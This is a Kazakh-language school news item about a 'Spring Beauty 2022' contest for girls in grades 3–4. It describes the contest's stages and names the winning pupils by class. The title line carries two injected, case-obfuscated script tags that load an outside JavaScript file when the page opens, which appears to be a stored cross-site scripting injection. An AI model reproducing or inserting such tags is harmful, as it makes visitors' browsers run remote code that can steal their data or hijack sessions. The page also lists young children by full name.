Көктем аруы — 2022<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2022 10 наурыз күні мектебімізде, 3-4 сыныптардың қыздары арасында «Көктем аруы – 2022» байқауы өтті. Мақсаты: Қыз балаларға адамгершілік, адалдық, әсемдік, әдемілік, іс - қимыл, жүріс - тұрыс, қыз сымбаты түрлерін терең түсіндіре отырып, олардың өнерлерін, ұшқыр ойларын, іс - әрекетке деген икемділігін анықтап бағалау, одан әрі дамыту. Сайыс 3 кезеңнен тұрды. 1 кезең – таныстыру; 2 кезең – өз өнерін көрсету; 3 кезең – қолдан жасалған бұйымдарын өздері таныстырады (үй жұмысы). Сайыс қорытындысы бойынша: Бас жүлде - 4 "б" сынып оқушысы -Ирмагамбет Аяулым; І орын - 3 "а" сынып оқушысы - Сембай Каусар; І орын - 4 "в" сынып оқушысы -Досмамбетова Айнұр; ІІ орын - 3 "г" сынып оқушысы -Көшербай Айзере ; ІІ орын - 3 "б" сынып оқушысы -Оралқан Айзере; ІІІ орын - 4 "а" сынып оқушысы -Оразбек Шаризат ; ІІІ орын - 3 "в" сынып оқушысы -Тюребекова Дильназ; ІІІ орын - 4 "г" сынып оқушысы -Жұмабай Ансура марапатталды. Қалған қатысушыларға әртүрлі номинациялар бойынша марапаттар берілді.
Просмотров: 420


Пікір қосу



Деректерді қолтаңбаға қосу